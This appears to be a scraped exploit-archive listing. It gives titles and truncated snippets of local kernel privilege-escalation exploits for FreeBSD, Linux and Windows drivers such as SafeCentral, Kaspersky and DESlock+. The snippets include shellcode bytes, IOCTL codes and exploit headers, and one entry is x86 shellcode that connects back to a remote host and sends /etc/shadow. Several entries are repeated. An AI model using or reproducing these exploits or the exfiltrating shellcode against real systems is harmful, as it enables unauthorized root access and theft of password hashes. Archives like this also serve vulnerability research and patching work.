FreeBSD - 'mountnfs()' Denial of Service
/ mountnfsex.c -- Patroklos Argyroudis, argp at domain census-labs.com Local kernel exploit for FreeBSD 8.0, 7.3 and 7.2. Discovered and exploited by Patroklos argp Argyroudis. The vulnerability is in mountnfs which is reachable by the mount2 and nmount2 system calls. In order for them to be...
Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM exploit
No description provided by source. / safecentral-unharden-v2.c Copyright c 2009 by [email protected] Authentium SafeCentral = 2.6 shdrv.sys local kernel ring0 SYSTEM exploit by mu-b - Thu 3 Sep 2009 - Tested on: shdrv.sys 2.0.0.146 Compile: MinGW + -lntdll - Private Source Code -DO NOT DISTRIBU...
Authentium SafeCentral 2.6 - 'shdrv.sys' Local Kernel Ring0 SYSTEM
/ safecentral-unharden-v2.c Copyright c 2009 by Authentium SafeCentral include include include define SAFECNTRLIOCTL 0x00226003 static unsigned char win32fixup = "\x53" "\xb8\x00\x00\x00\x00" "\xbb\x00\x00\x00\x00" "\x8b\x00" "\x89\x03" "\x31\xdb" "\x4b" "\x89\x18"; / Win2k3 SP1/2 - kernel EPROCE...
Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM
Exploit for unknown platform in category local exploits ========================================================================= Authentium SafeCentral include include include define SAFECNTRLIOCTL 0x00226003 static unsigned char win32fixup = "\x53" "\xb8\x00\x00\x00\x00" "\xbb\x00\x00\x00\x00"...
Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak
Linux Kernel 2.6.32-rc1 x86-64 - Register Leak / written by Ingo Molnar -- it's true because this comment says the exploit was written by him! / include include unsigned int r81; unsigned int r82; unsigned int r91; unsigned int r92; unsigned int r101; unsigned int r102; unsigned int r111; unsigne...
Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [3]
No description provided by source. This third version features: Complete support for i386, x8664, ppc and ppc64; The personality trick published by Tavis Ormandy and Julien Tinnes; The TOC pointer workaround for data items addressing on ppc64 i.e. functions on exploit code and libc can be...
Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)
Exploit for linux platform in category local exploits ============================================================== Linux Kernel 2.6.19 udpsendmsg Local Root Exploit x86/x64 ============================================================== / second verse, same as the first CVE-2009-2698 udpsendmsg,...
Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit
No description provided by source. / dedicated to my best friend in the whole world, Robin Price the joke is in your hands just too easy -- some nice library functions for reuse here though credits to julien tinnes/tavis ormandy for the bug may want to remove the attributeregparm3 for 2.4 kernels...
Linux 2.6.30+/SELinux/RHEL5 Test Kernel Local Root Exploit 0day
No description provided by source. / super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun A vulnerability which, when viewed at the source level, is unexploitable! But which, thanks to gcc optimizations, becomes exploitable : Also, bypass of mmapminaddr via SELinux vulnerability!...
Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit
No description provided by source. / ptraceattach privilege escalation exploit by s0m3b0dy tested on Gentoo 2.6.29rc1 grataz: Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo... email: s0m3b0dy1 at gmail.com / include grp.h include stdio.h include fcntl.h include errno.h includ...
FreeBSD 7.0/7.1 (ktimer) Local Kernel Root Exploit
No description provided by source. / bsd-ktimer.c Copyright c 2008 by [email protected] [email protected] FreeBSD = 7.0 local kernel root exploit by christer/mu-b - Mon 2 June 2008 - Tested on: FreeBSD 7.0 FreeBSD 7.1 - Private Source Code -DO NOT DISTRIBUTE - http://www.bsdcitizen.org/ -...
FreeBSD 7.0/7.1 - ktimer Local Privilege Escalation
FreeBSD 7.0/7.1 - ktimer Local Privilege Escalation / bsd-ktimer.c Copyright c 2008 by FreeBSD = 7.0 local kernel root exploit by christer/mu-b - Mon 2 June 2008 - Tested on: FreeBSD 7.0 FreeBSD 7.1 - Private Source Code -DO NOT DISTRIBUTE - http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$! / defi...
FreeBSD 7/6x protosw kernel exploit
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 uname -rs FreeBSD 7.0-RELEASE id uid=1001donb gid=1001donb groups=1001donb,0wheel grep ^root /etc/master.passwd grep: /etc/master.passwd: Permission denied nm /boot/kernel/kernel | grep allproc c0bf26b8 B allproc c0bf2670 B allproclock cc -o x x.c ./x...
Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit
No description provided by source. / gw-ftrex.c: Linux kernel 2.6.22 open/ftruncate local exploit by gat3way at gat3way dot eu bug information: http://osvdb.org/49081 !!!This is for educational purposes only!!! To use it, you've got to find a sgid directory you've got permissions to write into...
Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit
Exploit for linux platform in category local exploits ====================================================== Linux Kernel bug information: http://osvdb.org/49081 !!!This is for educational purposes only!!! To use it, you've got to find a sgid directory you've got permissions to write into obvious...
linux/x86 connect back.send.exit /etc/shadow 155 bytes
No description provided by source. ; CoDed by 0in ; Dark-Coders Group Productions ; Linux x86 connect back&send&exit /etc/shadow 155 byte shellcode ; www.dark-coders.pl ; Contact: 0indotemailatgmaildotcom ; Greetings to:dieAngel,suN8Hclf,m4r1usz,cOndemned ; Compile: ; nasm -f elf shellcode.asm ; ...
Linux Kernel <= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)
No description provided by source. / k-rad3.c - linux 2.6.11 and below CPL 0 kernel local exploit v3 Discovered and original exploit coded Jan 2005 by sd [email protected] Modified 2005/9 by alert7 [email protected] XFOCUS Security Team http://www.xfocus.org gcc -o k-rad3 k-rad3.c -static -O2 test...
Deterministic Network Enhancer dne2000.sys kernel ring0 SYSTEM exploit
No description provided by source. / dne2000-call.c Copyright c 2008 by [email protected] Deterministic Network Enhancer dne2000.sys local kernel ring0 SYSTEM exploit by mu-b - Sun 06 Jan 2008 - Tested on: dne2000.sys 2.21.7.233 - 3.21.7.17464 bundled with: SafeNET HighAssurance Remote,...
DESlock+ <= 3.2.6 local kernel ring0 link list zero SYSTEM Exploit
Exploit for unknown platform in category local exploits ================================================================== DESlock+ DESlock+ include include include define DLMFENCIOCTL 0x0FA4204C define DLMFENCFLAG 0xC001D00D define DLKFDISKRIOCTL 0x80002008 define DLKFDISKSLOT 0x00000C5C define...
Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Overflow Local Privilege Escalation
Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Overflow Local Privilege Escalation //////////////////////////////////// ///// AVP Kaspersky //////////////////////////////////// //// FOR EDUCATIONAL PURPOSES ONLY //// Kernel Privilege Escalation 2 //// Exploit //// Rubén Santamarta ////...